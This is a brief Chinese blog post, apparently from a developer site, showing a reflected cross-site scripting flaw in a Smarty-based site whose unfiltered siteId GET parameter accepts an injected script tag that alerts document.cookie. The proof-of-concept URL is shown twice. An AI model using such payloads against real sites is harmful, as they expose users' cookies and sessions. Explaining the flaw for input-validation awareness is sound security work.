代码是这样的:
xxxx.com/en/index?siteId="><script>alert(document.cookie)<%2fscript>
smarty get没做过滤的,有点坑
Smarty GET 注入案例
本文展示了一个关于 Smarty 框架中 GET 参数未经过滤导致的安全漏洞实例。具体表现为利用特殊字符构造恶意代码,尝试从网站获取敏感信息。此案例强调了对用户输入进行验证的重要性。
代码是这样的:
xxxx.com/en/index?siteId="><script>alert(document.cookie)<%2fscript>
smarty get没做过滤的,有点坑
4446

被折叠的 条评论
为什么被折叠?